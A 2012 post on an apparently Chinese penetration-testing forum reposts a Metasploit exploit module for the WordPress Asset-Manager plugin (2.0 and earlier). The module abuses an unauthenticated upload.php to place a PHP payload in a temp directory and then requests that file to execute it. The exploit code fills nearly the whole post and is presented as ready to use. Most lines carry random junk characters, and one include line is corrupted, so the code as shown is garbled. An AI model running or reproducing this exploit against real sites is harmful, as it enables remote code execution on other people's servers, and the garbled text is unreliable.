找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2798|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
* \# h. o3 c( e8 q) `8 w0 s1 {
##; N' W$ X7 s4 `6 ]8 {' R$ J. Q6 P
# This file is part of the Metasploit Framework and may be subject to2 N' M5 h( L4 o) |& B' Z
# redistribution and commercial restrictions. Please see the Metasploit: T$ |* |  ?7 p. ]
# Framework web site for more information on licensing and terms of use.# c9 L5 c7 s' x9 n2 o
#   http://metasploit.com/framework/
! O8 V. ?3 ^- T% a5 w/ B6 }7 K( v##  {$ s0 A9 Q2 Q; q

' k0 J) h, ^7 r) nrequire 'msf/core'% n' M# `9 M4 V. Z6 x. u' h
require 'msf/core/exploit/php_exe'/ d, ^# g, J% r; c# `. D

5 \- h2 D; p" t3 i: D8 `$ aclass Metasploit3 < Msf::Exploit::Remote
) [* \# L5 t9 [4 S# |& [  Rank = ExcellentRanking3 v7 }6 x5 F$ |9 {$ ^: [

8 `* e; z8 r% i. x7 \  include Msf::Exploit::Remote::HttpClient
3 Z6 }2 K& A) |: Z# k$ u  include Msf::Exploit:hpEXE$ ~" T$ o$ n7 n. O0 R

7 {- y4 n& y' H  def initialize(info = {})- o: K- K7 ]# Q7 C8 _
    super(update_info(info,
' x1 a* h  M" [$ l/ j      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',5 N3 q- Q0 m/ u/ z& L8 V0 ?, }
      'Description'    => %q{+ c- V% E. l" I/ ]" O7 B' M& k* l8 r1 o; Y
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress, v- S3 V( S5 Q, C2 @$ h+ O) }) a
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
+ ^, A% @, a% d7 |        temp directory without authentication, which results in arbitrary code execution.7 W, r& X  }" C
      },4 E/ }- o4 M' r% R: {0 @( Q( a& O6 H
      'Author'         =>
$ h+ V+ P0 ~0 v' ~: u% F$ I        [
9 `+ ^, ^' O( Z* I* ]# X          'Sammy FORGIT', # initial discovery- N; H* I3 |6 \$ |- E' r
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
6 u4 @, N: X7 ~) o+ m1 V* x        ],
& a0 J6 v4 l( J' S  k1 h      'License'        => MSF_LICENSE,) N& w4 q" F- {1 P9 A' u
      'References'     =>
  J7 ]- i& i5 p% I  [        [' \3 |( P  i. ~/ I1 q1 ]
          [ 'OSVDB', '82653' ],
7 _# F5 j- N/ C0 K6 ]          [ 'BID', '53809' ],7 ]' R& X- z8 [( j
          [ 'EDB', '18993' ],6 o& p- C5 t" q+ u
          [ 'URL', 'http:// www.myhack58.com /' ]" g7 n& g4 v+ f. j3 X8 }
        ],
2 h0 X7 p8 q' P0 p. W" B      'Payload'       =>9 {$ U3 A" V& e
        {
3 K( u1 K7 Q% `% o8 f& X          'BadChars' => "\x00",- q- i+ j; h9 A- ~3 e# ~* y
        },
) W! H8 u) Y! c8 t7 p/ J( e      'Platform'       => 'php',  X' M8 Q7 q5 C3 w; N
      'Arch'           => ARCH_PHP,2 _5 v' W# v; r
      'Targets'        =>
8 G; A2 S5 J; Y7 M" ?; a        [$ P4 s) I% h! Y& y
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
/ T3 `2 p% g8 z9 [5 j: Z          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
" U  W% O- }' }$ _3 [& z) g        ],
$ W. C6 [) J% ?+ ~0 w0 c* w% |' R      'DefaultTarget' => 0,
( L' t+ M/ c% F$ M3 x      'DisclosureDate' => 'May 26 2012'))  D$ ?1 |4 {) N- w( J; T

# Y! \* @6 m4 a5 l    register_options(# G. T: G: s6 u# N; k
      [
, F% I( i- P7 J4 g& O        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
! A3 z; h# ~+ e. a      ], self.class)
4 }* ]9 ?" f5 C2 s! D! ?  end
" _5 R) H- |8 ~* Z5 X* R0 A 1 [/ ]5 L. Y# \) u6 w" f6 n
  def exploit3 e9 E# b' v+ g0 a' Y
    uri =  target_uri.path
8 h/ m. T* h( i$ O    uri << '/' if uri[-1,1] != '/'& W6 w3 c5 c3 U
    peer = "#{rhost}:#{rport}"
( e, ^) g  V+ f6 ?3 v+ D    payload_name = "#{rand_text_alpha(5)}.php"
# x- |1 T$ c, E$ |$ S% p( e: Z    php_payload = get_write_exec_payload(:unlink_self=>true)! W& `. X) o0 A! k/ a! j- U  ?
+ a$ \* a( C( s, v! ?( u$ W5 L
    data = Rex::MIME::Message.new
  `$ T% v/ P  O/ R; s    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")2 p9 \+ `. R7 ^. ?( H! B
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')& w$ ?# a' z% `
* T( F- h) i+ S
    print_status("#{peer} - Uploading payload #{payload_name}")
8 S3 u& Y! ~/ [$ b. I4 m    res = send_request_cgi({
* Z/ w& v" ?  `! I7 C+ w: [( E      'method'  => 'POST',/ P. o8 V! f& P( A) S
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ B0 M: t+ J+ z      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
8 p6 l# u) V# S! b7 C6 e: g$ Q      'data'    => post_data/ z3 }! j9 u) \" |; y
    })
& \8 a1 g5 j: k3 ^( O! r5 R , _; O+ ^4 E1 D# J% r: W7 Q: z- _
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
# E4 r) Z4 m3 Y: ^8 `; {& X      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")! F8 U: x; x! f* q: O( _
end. r9 P$ A3 S; `9 |$ B7 p  w% i6 m

5 h0 S. S+ @& t6 r    print_status("#{peer} - Executing payload #{payload_name}")
( G8 N2 i/ [8 }. x3 H2 o    res = send_request_raw({
7 u( s5 p4 K2 B      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
0 }* V7 {  T/ i) B) i4 r* F      'method'  => 'GET') M% o- ?$ `3 q. ~/ G( ?& Z
    })
+ A2 y- q* l6 ^$ E7 p
! J) G& O4 B1 _/ D  W    if res and res.code != 200
# K2 N4 J- K) b, `( a      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed"), b9 L! l/ X  {! E  C# A. [
    end. {) b; E9 L! S7 ]& s& ~) v; ?( P
  end  R6 \% {; g! K' u6 V, ~
end: A7 x8 P! A2 \& F5 g
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表